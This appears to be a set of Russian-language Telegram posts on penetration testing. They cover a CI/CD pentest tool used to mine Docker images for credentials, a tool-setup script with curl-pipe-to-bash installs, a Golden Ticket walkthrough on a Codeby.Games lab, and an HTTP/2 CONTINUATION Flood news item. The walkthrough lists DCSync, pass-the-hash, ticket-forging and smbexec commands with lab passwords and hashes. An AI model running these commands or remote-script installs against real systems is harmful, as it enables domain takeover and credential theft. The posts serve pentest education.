🔺 Ускоряем пентест CI/CD

Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.

В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:

🔵 Репозитории исходного кода (Gitlab, Gitea)

🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog)

🔵 Серверы автоматизации (Gitlab-CI, Jenkins)

🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили).

⏱ Перспективы копать именно под CI/CD: Возможности и проблемы

Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации.

Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)

📕

Пример таких уязвимостей:

CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК

Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.

😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD

💻 Сразу ссылка на инструмент — ТЫК

Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился).

Модули Epyon охватывают широкий спектр, включая:

1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise

✏️ Перейдем к тестам

Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).

Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.

Пример: HTTP API Docker Registry.

Команда epyon registry может быть использована для взаимодействия с реестром Docker:

Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:

⏩ Шаг 01: Получить список образов

Опция list-images может быть использована для перечисления всех образов контейнеров.

⏩ Шаг 02: Получить теги для каждого образа

Опция list-tags получит все доступные теги для каждого образа.

⏩ Шаг 03: Скачать образы контейнеров

Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).

⏩ Шаг 04: Поиск учетных данных

Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.

🥂 Profit

Вот нами уже и найдены login/pass, api key и много других критически важных артефактов

🛡 Заключение

В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.

#redteam

Целуй ту руку, что тебя кормит
#projectdiscovery #nuclei #automation

Решил для себя и для вас написать ультимативный скрипт, который будет устанавливать все нужные инструменты от PD и оперативно подготавливать машину к пентесту.

Создать файл: nano setup.sh

#!/bin/bash

echo "██████╗  ██████╗ ██╗  ██╗███████╗██╗  ██╗"
echo "██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██║ ██╔╝"
echo "██████╔╝██║   ██║ ╚███╔╝ █████╗  █████╔╝ "
echo "██╔═══╝ ██║   ██║ ██╔██╗ ██╔══╝  ██╔═██╗ "
echo "██║     ╚██████╔╝██╔╝ ██╗███████╗██║  ██╗"
echo "╚═╝      ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝"
echo
echo "Created by Zybnev Sergey | https://t.me/poxek"
echo 

echo "Install prerequirements..."
sudo apt-get update &> /dev/null
sudo apt-get install -y git curl wget &> /dev/null

if ! command -v go &> /dev/null; then
    echo "Go is not installed. Installing..."

    wget https://golang.org/dl/go1.22.1.linux-amd64.tar.gz

    sudo tar -C /usr/local -xzf go*.linux-amd64.tar.gz

    rm go*.linux-amd64.tar.gz

    echo -e '\n\n\nexport PATH=$PATH:/usr/local/go/bin\nexport PATH="$PATH:$HOME/go/bin"' >> ~/.zshrc

    source ~/.zshrc

    echo -e "Go has been installed successfully: $(go version)\nStarting install..."
else
    echo "Starting install..."
fi

echo "Install deps..."
sudo apt-get install -y libpcap-dev &> /dev/null

echo "Installing tools..."
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/katana/cmd/katana@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install github.com/projectdiscovery/notify/cmd/notify@latest

echo "Install nuclei templates"
cd ~
git clone https://github.com/projectdiscovery/nuclei-templates
git clone https://github.com/projectdiscovery/fuzzing-templates

echo "Add cron jobs for updating fuzzing & nuclei templates"
## Define the cron job command to check for
update_nuclei_templates="0 */12 * * * cd ~/nuclei-templates && git pull"
update_fuzzing_templates="0 */12 * * * cd ~/fuzzing-templates && git pull"

## Check if the cron job1 exists in the crontab
if crontab -l | grep -qF "$update_nuclei_templates"; then
    echo "The cron job1 exists in the crontab."
else
    echo -e "$update_nuclei_templates\n$update_fuzzing_templates" | crontab -
fi

clear
echo "Thx for using script! tg@poxek"

Запуск:
chmod u+x setup.sh; ./setup.sh

Но если более короткий способ:

curl https://raw.githubusercontent.com/szybnev/setup/main/setup.sh | bash

Надеюсь этот скрипт будет использоваться в будущем. Я уж точно буду им пользоваться)

🛠 Github

Если у вас есть идеи, какие инструментами все пользуются и их стоит добавить, то оставляйте issues!

🐈 Бонус:
Скрипт для смены цветовой палитры термина. Тут выбрать палитру. Скрипт выведет список палитр и по номеру(ам) установит выбранную схему(ы):

bash -c  "$(wget -qO- https://git.io/vQgMr)"

Я себе поставил Google Dark - 83

🌚 @poxek

🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

Критическая брешь в HTTP/2: CONTINUATION Flood приводит к мощнейшим DoS-атакам

🔒 Исследователь в области кибербезопасности Бартек Новотарски обнаружил уязвимость в протоколе HTTP/2, получившую название «HTTP/2 CONTINUATION Flood». ‍

🥷 Злоумышленник может использовать эту уязвимость для DoS-атаки, отправив бесконечный поток заголовков, что приведет к переполнению памяти сервера и его аварийному завершению работы.

💡Брешь затрагивает множество популярных проектов, таких как Apache HTTP Server, Apache Tomcat, Golang и Node.js. В качестве временного решения рекомендуется отключить поддержку HTTP/2 на сервере, до применения обновления, чтобы избежать потенциальных атак.

#CyberSecurity #HTTP2Vulnerability #DoSAttack @SecLabNews